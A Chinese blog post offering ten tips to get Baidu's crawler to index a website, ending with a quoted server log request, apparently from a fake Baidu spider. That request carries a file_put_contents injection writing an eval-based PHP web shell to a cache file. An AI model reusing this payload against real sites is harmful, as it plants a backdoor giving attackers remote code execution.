今天来聊一个老生常谈的话题:百度蜘蛛为什么不来抓取我们的网站?


百度蜘蛛为什么不抓取我的网站

首先要告诉大家一个令人沮丧的事实:包括百度在内的国内搜索引擎,对于新网站基本上都会采取谨慎爬取的态度。Google的蜘蛛倒是很勤快,收录也很快,但是因为你知道的原因,国内Google的用户实在是太少了,因此,意义也不大。


怎么让百度蜘蛛抓取网站?

      1.高权重的外链
 
  高权重网站就有权威、百度蜘蛛是肯定特殊对待的,抓取的频率就相对高,而且网站的权重越高被爬行的深度也会比较高,相应能被抓取的页面也会变多。这样的话蜘蛛也会随着友情链接爬行到我们自己的网站,所以大家在换友链的时间,尽量换高权重的站点。
 
  2.网站保持更新
 
  蜘蛛每次爬行都会把页面数据存储起来。如果第二次爬行发现页面与第一次收录的完全一样,说明页面没有更新,蜘蛛也就没有必要经常抓取了。页面内容经常更新,蜘蛛就会更加频繁的访问页面。有规律的进行文章更新,这样蜘蛛就会根据你的规律有效的过来抓取,不仅让你的更新文章能更快的抓取到,而且也不会造成蜘蛛经常性的白跑一趟。还有就是更新后,记得主动去提交链接。
 
  3.文章的原创性
 
  优质的原创内容对于百度蜘蛛的诱惑力是非常巨大的,蜘蛛存在的目的就是寻找新东西,所以网站更新的文章不要采集、也不要每天都是转载,我们需要给蜘蛛真正有价值的原创内容,蜘蛛能得到喜欢的,自然会对你的网站产生好感,经常性的过来觅食。
 
  4.首页推荐
 
  首页是蜘蛛来访次数最多的页面,也是网站权重最高的页面,可以在首页设置更新版块,这样不仅能让首页更新起来,促进蜘蛛的来访频率,而且可以促进更新页的抓取收录。同理在栏目页也可以进行此操作。
 
  5.扁平化网站结构
 
  蜘蛛抓取也是有自己的线路的,在之前你就给他铺好路,网站结构不要过于复杂,链接层次不要太深,一般三层即可。如果链接层次太深,后面的页面很难被蜘蛛抓取到。
 
  6.网站内链建设
 
  蜘蛛的爬行是跟着链接走的,所以内链的合理优化可以要蜘蛛抓取到更多的页面,促进网站的收录。内链建设过程中要给用户合理推荐,除了在文章中增加锚文本之外,可以设置相关推荐,热门文章,更多喜欢之类的栏目,这是很多网站都在利用的,可以让蜘蛛抓取更大范围的页面。
 
  7.建设网站地图
 
  搜索引擎蜘蛛非常喜欢网站地图,网站地图是一个网站所有链接的容器。很多网站的链接层次比较深,蜘蛛很难抓取到,网站地图可以方便搜索引擎蜘蛛抓取网站页面,通过抓取网站页面,清晰了解网站的架构,所以建设一个网站地图不仅提高抓取率还能获得蜘蛛好感。
 
  8.检查死链,设置404页面
 
  搜索引擎蜘蛛是通过链接来爬行搜索,如果太多链接无法到达,不但收录页面数量会减少,而且你的网站在搜索引擎中的权重会大大降低。蜘蛛在遇见死链就像进了死胡同,又得折返重新来过,大大降低蜘蛛在网站的抓取效率,所以一定要定期排查网站的死链,向搜索引擎提交,同时要做好网站的404页面,告诉搜索引擎错误页面。
 
  9.检查robots文件
 
  很多网站有意无意的直接在robots文件屏蔽了百度或网站部分页面,却整天在找原因为什么蜘蛛不来抓取我的页面,这能怪百度吗?你都不让别人进门了,百度是怎么收录你的网页?所以有必要时常去检查一下网站robots文件是否正常。
 
  10.监测蜘蛛的爬行
 
  利用网站日志监测蜘蛛正在抓取哪些页面、抓取过哪些页面,还可以利用站长工具对蜘蛛的爬行速度进行查看,合理分配资源,以达到更高的抓取速度和勾引更多的蜘蛛。网站要获得更多的收录就需要做好搜索引擎蜘蛛的抓取优化工作,网站优化不是一朝一夕的事情,耐心做好基础工作才是网站优化的根本。

百度蜘蛛爬取后门?

今天看到一条百度蜘蛛爬取记录:

/?m=content&c=content&a=public_sub_categorys&menuid=file_put_contents(_GETfile,_GETshell)&file=./caches/ppf.php&shell=?phpvar_dump(md5(123));@content=stripslashes(_POSTppf);@eval(content);

同事说这是在找网站漏洞,以便注入一些不友好的脚本到网站,关于这条记录,目前有两个猜测:

一是,这是一个假的百度蜘蛛;二是,网站确实有问题且被百度蜘蛛爬取了。


扩展阅读

[b2_insert_post id="1204"]


叽里咕噜~叽里咕噜~我又要去打杂啦づ ̄3 ̄)づ╭❤~